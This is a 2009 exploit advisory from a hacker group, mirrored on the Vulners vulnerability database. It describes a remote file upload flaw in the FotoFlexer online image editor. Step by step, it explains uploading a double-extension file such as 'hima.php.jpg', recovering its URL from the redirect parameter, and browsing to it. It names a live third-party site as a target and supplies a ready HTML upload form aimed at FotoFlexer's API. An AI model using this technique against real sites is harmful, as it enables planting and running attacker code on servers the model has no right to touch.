Vulners
Lucene search
FotoFlexer File Upload
`[*]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__\ #
[+] |______________________|___||\*___ #
[+] |______________________|___||""|"*\___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]======================================================================||
[*] Title : FotoFlexer Remote File Upload Vulnerability ||
[!] site script : http://www.fotoflexer.com ||
[!] Author : ViRuS_HiMa ||
[!] My Site : wWw.HeLL-z0ne.org ||
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||
[!] Location : Cairo-007 ||
[!]======================================================================||
[!] [H]eL[L] [Z]on[E] [C]re[W] - [ ViRuS_HiMa ~ MecTruy ~ RedStorM ] ||
[!]======================================================================||
[!] Exploitation :
[!]
[!] Fotoflexer is A online images editor script . .
[!]
[!] it's allow you to upload 2 types of images : png & jpg
[!]
[!] So you can upload your file as hima.php.jpg 'or' hima.php.png
[!]
[!] but how to get your file link after uploading ??
[!]
[!] here we got alive e.g on : http://tahyeess.com/fotoflexer/default.aspx
[!]
[!] after uploading your file you will redirect to this link :
[!]
[!] http://tahyeess.com/fotoflexer/API_Loader.aspx?ff_image_url=
[!] http://www.tahyeess.com/OriginalFiles/fotoflexer/hima.php.jpg
[!] &ff_callback_url=http://www.tahyeess.com/fotoflexer/callbackTest.aspx
[!] &ff_logo_url=http://www.tahyeess.com/fotoflexer/images/logo.png
[!]
[!] yea its too long url but you can find your file link in it ! take look over here :
[!]
[!] "ff_image_url=http://www.tahyeess.com/OriginalFiles/fotoflexer/hima.php.jpg"
[!]
[!] Thats all we need :)
[!]
[!] now you should browse it from InternetExplorer :)
[!]
[!]===============================================================||
[!] do you want to try it on http://www.fotoflexer.com :) ||
[!] just use this html code to upload your file ||
[!] and you will find your link by the same method on tahyeess.com||
[!] but your file link will be some thing like this : ||
[!] ff_image_url=http://fotos.fotoflexer.com/2009/07/13/adf487e0 ||
[!]===============================================================||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>FotoFlexer - exploitation testing :)</title>
<script type="text/javascript">
/********************************
Thankx fotoflexer for helping
Me to exploit yours :p
*********************************/
var ff_image_url;
var ff_callback_url;
var ff_cancel_url;
var ff_lang;
function ff_setup(img_src){
ff_image_url = img_src;
ff_callback_url = "http://fotoflexer.com/API/callbackTest.php";
ff_cancel_url = "http://fotoflexer.com";
ff_lang = "en-US";
ff_activate();
}
</script>
<script type="text/javascript"
src="http://fotoflexer.com/API/ff_api_v1_01.js">
</script>
</head>
<body style="text-align: center;">
<div style="width: 650px; margin: 0 auto;">
<p style="text-align: left;"><a href="/api.php">Back to FotoFlexer API</a></p>
<h2>FotoFlexer - Exploitation Testing :)</h2>
<p style="text-align: left;">this code was already writen by fotoflexer team and edited by ViRuS_HiMa to be decent .</p>
<p style="text-align: left;">[H]eL[L] [Z]on[E] [C]re[W] - [ ViRuS_HiMa ~ MecTruy ~ RedStorM ]</p>
<hr />
<h4>Click An Image To Edit:</h4>
<div>
<img style="cursor:pointer;width:60px;height:60px;padding:10px;"
src="http://fotoflexer.com/images/moon_sample.jpg"
id="http://fotoflexer.com/samples/moon.jpg"
onclick="ff_setup(this.id)" />
<img style="cursor:pointer;width:60px;height:60px;padding:10px;"
src="http://fotoflexer.com/images/sunflower_sample.jpg"
id="http://fotoflexer.com/samples/sunflower.jpg"
onclick="ff_setup(this.id)" />
<img style="cursor:pointer;width:60px;height:60px;padding:10px;"
src="http://up1.mlfnt.net/images/g38aocj60k9mstu1eso.gif"
id="http://up1.mlfnt.net/images/g38aocj60k9mstu1eso.gif"
onclick="ff_setup(this.id)" />
</div>
<hr />
<h4>Or, Upload An Image To Edit:</h4>
<!--Pass the Callback URL as "CB" and the logo URL as "Logo"-->
<form enctype="multipart/form-data"
action="http://fotoflexer.com/API/API_Upload.php" method="post">
<p><input name="userfile" type="file" /><br />
<input type="hidden" name="Logo" value="http://www.fotoflexer.com/images/header.gif" />
<input type="hidden" name="CB" value="http://www.fotoflexer.com/API/callbackTest.php" />
<input type="submit" value="Upload" /></p>
</form>
</div>
</body>
</html>
[*]===================================================================||
[!] Greetz 2 Allah - Muslim Hackers - Str0ke - And oTherz . ||
[*]===================================================================||
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jul 2009 00:00Current
7.4High risk
Vulners AI Score7.4